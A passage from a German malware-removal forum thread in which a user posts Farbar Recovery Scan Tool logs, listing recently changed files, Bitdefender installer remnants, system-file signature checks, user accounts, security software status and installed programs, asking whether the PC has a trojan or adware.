2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe 2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\atigktxx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll 2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll 2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll 2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\amdmcl32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll 2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. 
) C:\WINDOWS\SysWOW64\atimpc32.dll 2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed 2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages 2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-05-07 18:11 - 
2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2017-05-07 18:09 
- 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries 2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular 2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017 2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017 2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia 2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016 2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™ 2017-05-07 17:16 - 2015-08-22 
14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin 2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker 2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING 2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung 2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader 2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II 2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net 2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam 2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician 2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod 2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys 2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc 2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24 2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8 2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1 2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung 2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities 2017-05-07 17:14 
- 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive 2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek 2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared 2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared 2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD 2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT 2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache 2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam 2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb 2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb 2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap 2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap 2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0 ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg 2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () 
C:\ProgramData\agent.1486316443.bdinstall.bin 2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin 2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin 2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin 2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin 2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin 2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin 2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin 2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin 2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin 2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin 2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin 2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin 2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin 2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl Einige Dateien in TEMP: ==================== 2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2017-05-19 15:19 ==================== Ende von FRST.txt |
21.05.2017, 20:14 | #5 |
| Trojan, adware or something else? Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017 durchgeführt von Dino (21-05-2017 21:05:18) Gestartet von D:\Dino\Downloads Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled) Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled) ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371} AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) 
Hidden Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.) AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft) ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft) Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft) ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.) ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios) Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender) Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender) Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.) Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.) Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.) Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.) Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.) 
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.) Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL 